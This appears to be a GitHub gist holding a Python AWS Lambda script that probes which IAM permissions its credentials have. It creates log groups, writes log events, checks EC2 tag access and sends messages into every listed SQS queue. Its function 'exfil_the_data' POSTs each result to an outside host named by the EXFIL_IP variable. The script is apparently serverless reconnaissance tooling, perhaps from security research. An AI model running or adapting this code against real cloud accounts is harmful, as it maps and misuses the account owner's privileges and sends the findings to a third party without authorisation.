Skip to content

Instantly share code, notes, and snippets.

@andrewkrug
Created July 15, 2017 22:08
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save andrewkrug/c2a8858e1f63d9bcf38706048db2926a to your computer and use it in GitHub Desktop.
Save andrewkrug/c2a8858e1f63d9bcf38706048db2926a to your computer and use it in GitHub Desktop.
import botocore
import boto3
import json
import os
import time
import uuid
try:
import urllib2
except:
import urllib.request as urllib2
"""
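Checks to run if the environment is AWS.

Each check probes whether the current credentials are allowed to perform one
of the following IAM actions:
logs:CreateLogGroup
logs:CreateLogStream
logs:PutLogEvents
ec2:DescribeTags
sqs:ListQueues
sqs:SendMessage (reported under the 'PutMessage' result key)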
"""
def _cloudwatch_create_log_group(client):
    """Probe logs:CreateLogGroup by creating a randomly named log group.

    Args:
        client: CloudWatch Logs client exposing ``create_log_group``.

    Returns:
        True if the call completed, False if it raised
        ``botocore.exceptions.ClientError``.
    """
    # The group name carries a random hex suffix generated per call.
    group_name = "serverless-observatory-check-{uuid}".format(uuid=uuid.uuid4().hex)
    try:
        client.create_log_group(logGroupName=group_name)
    except botocore.exceptions.ClientError:
        return False
    return True
def _cloudwatch_create_log_stream(client):
    """Probe logs:CreateLogStream inside the current log group.

    The log group name is read from ``AWS_LAMBDA_LOG_GROUP_NAME``. Every probe
    uses a fresh, random stream name so that a stream left behind by an
    earlier run cannot make the call fail for a reason unrelated to
    permissions.

    Args:
        client: CloudWatch Logs client exposing ``create_log_stream``.

    Returns:
        True if the stream was created; False if the log group name is not
        set or the call raised ``botocore.exceptions.ClientError``.
    """
    log_group = os.getenv('AWS_LAMBDA_LOG_GROUP_NAME')
    if not log_group:
        # No log group to probe against; report the check as failed instead
        # of handing None to the client.
        return False
    stream_name = "serverless-observatory-check-{uuid}".format(uuid=uuid.uuid4().hex)
    try:
        client.create_log_stream(logGroupName=log_group, logStreamName=stream_name)
    except botocore.exceptions.ClientError:
        return False
    return True
def _cloudwatch_put_log_events(client):
    """Probe logs:PutLogEvents by writing a single test event.

    The target log group and stream are read from
    ``AWS_LAMBDA_LOG_GROUP_NAME`` and ``AWS_LAMBDA_LOG_STREAM_NAME``.

    Args:
        client: CloudWatch Logs client exposing ``put_log_events``.

    Returns:
        True if the call completed, False if it raised any exception.
    """
    try:
        client.put_log_events(
            logGroupName=os.getenv('AWS_LAMBDA_LOG_GROUP_NAME'),
            logStreamName=os.getenv('AWS_LAMBDA_LOG_STREAM_NAME'),
            logEvents=[
                {
                    # The API expects milliseconds since the epoch, not seconds.
                    'timestamp': int(time.time() * 1000),
                    'message': 'Test event from the serverless observatory profiler.',
                },
            ],
        )
    except Exception:
        # Deliberately broad: this is a best-effort probe, so any failure
        # (denied call, missing environment variables, ...) reads as "cannot".
        return False
    return True
def check_cloudwatch():
    """Run the CloudWatch Logs permission probes.

    Returns:
        dict mapping 'CreateLogGroup', 'CreateLogStream' and 'PutLogEvents'
        to the result of the corresponding probe.
    """
    logs_client = boto3.client('logs')
    return {
        'CreateLogGroup': _cloudwatch_create_log_group(logs_client),
        # Uses the log-stream probe; this key previously re-ran the
        # log-group probe by mistake.
        'CreateLogStream': _cloudwatch_create_log_stream(logs_client),
        'PutLogEvents': _cloudwatch_put_log_events(logs_client),
    }
def _ec2_can_describe_tags(client):
    """Probe ec2:DescribeTags with a dry-run request.

    A dry-run request is answered with an error either way: error code
    ``DryRunOperation`` means the caller has the permission, anything else
    (for example ``UnauthorizedOperation``) means it does not.

    Args:
        client: EC2 client exposing ``describe_tags``.

    Returns:
        True if the call completed or failed only with ``DryRunOperation``;
        False for any other ``botocore.exceptions.ClientError``.
    """
    try:
        client.describe_tags(DryRun=True, MaxResults=10)
    except botocore.exceptions.ClientError as e:
        error_code = e.response.get('Error', {}).get('Code')
        return error_code == 'DryRunOperation'
    return True
def check_ec2():
    """Run the EC2 permission probes.

    The client is created for the region named by ``AWS_DEFAULT_REGION``.

    Returns:
        dict mapping 'DescribeTags' to the result of that probe.
    """
    region = os.getenv('AWS_DEFAULT_REGION')
    ec2_client = boto3.client('ec2', region_name=region)
    return {'DescribeTags': _ec2_can_describe_tags(ec2_client)}
def _sqs_can_list_queues(client):
    """Probe sqs:ListQueues by listing the queues.

    Args:
        client: SQS client exposing ``list_queues``.

    Returns:
        True if the call completed, False if it raised
        ``botocore.exceptions.ClientError``.
    """
    try:
        client.list_queues()
    except botocore.exceptions.ClientError:
        return False
    else:
        return True
def _sqs_can_put_message(client):
    """Probe message sending by trying each listed queue until one accepts.

    Args:
        client: SQS client exposing ``list_queues`` and ``send_message``.

    Returns:
        True as soon as one ``send_message`` call completes; False if there
        are no queues, every send fails, or ``list_queues`` raised
        ``botocore.exceptions.ClientError``.
    """
    try:
        queue_urls = client.list_queues().get('QueueUrls') or []
    except botocore.exceptions.ClientError:
        return False

    for queue_url in queue_urls:
        try:
            # MessageBody must be a string; the previous dict value made
            # every send fail before it reached the service.
            client.send_message(QueueUrl=queue_url, MessageBody='{}')
        except Exception:
            # Best-effort: a failure on one queue should not stop the probe.
            continue
        # The first send that succeeds settles the check.
        return True
    return False
def check_sqs():
    """Run the SQS permission probes.

    Returns:
        dict mapping 'ListQueues' and 'PutMessage' to the result of the
        corresponding probe.
    """
    sqs_client = boto3.client('sqs')
    can_list = _sqs_can_list_queues(sqs_client)
    can_put = _sqs_can_put_message(sqs_client)
    return {'ListQueues': can_list, 'PutMessage': can_put}
def exfil_the_data(data, timeout=10):
    """POST a JSON string to the host named by the ``EXFIL_IP`` variable.

    Args:
        data: JSON document as text; it is UTF-8 encoded before sending.
        timeout: Seconds to wait on the HTTP request before giving up.

    Raises:
        ValueError: If ``EXFIL_IP`` is unset or empty.
    """
    exfil_ip = os.getenv('EXFIL_IP')
    if not exfil_ip:
        # Without this guard the URL would be built as "http://None/".
        raise ValueError('EXFIL_IP environment variable is not set.')

    req = urllib2.Request(
        "http://{EXFIL_IP}/".format(EXFIL_IP=exfil_ip),
        data=data.encode('utf-8'),
        headers={'Content-Type': 'application/json'},
    )
    response = urllib2.urlopen(req, timeout=timeout)
    try:
        print(response)
    finally:
        # Explicit close (rather than ``with``) because the file also
        # supports Python 2's urllib2.
        response.close()
def main(event, context):
    """Handler entry point: run every check group and send each result.

    Args:
        event: Invocation payload; not used.
        context: Invocation context; not used.
    """
    # Each group runs exactly once. The probes have side effects (they create
    # log groups and send messages), so the earlier discarded extra call to
    # check_cloudwatch() has been dropped.
    for run_check in (check_cloudwatch, check_ec2, check_sqs):
        exfil_the_data(json.dumps(run_check()))
if __name__ == "__main__":
    # Delegate to the handler instead of repeating its body, so running the
    # file as a script cannot drift from the handler. main() does not use
    # either argument.
    main(None, None)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment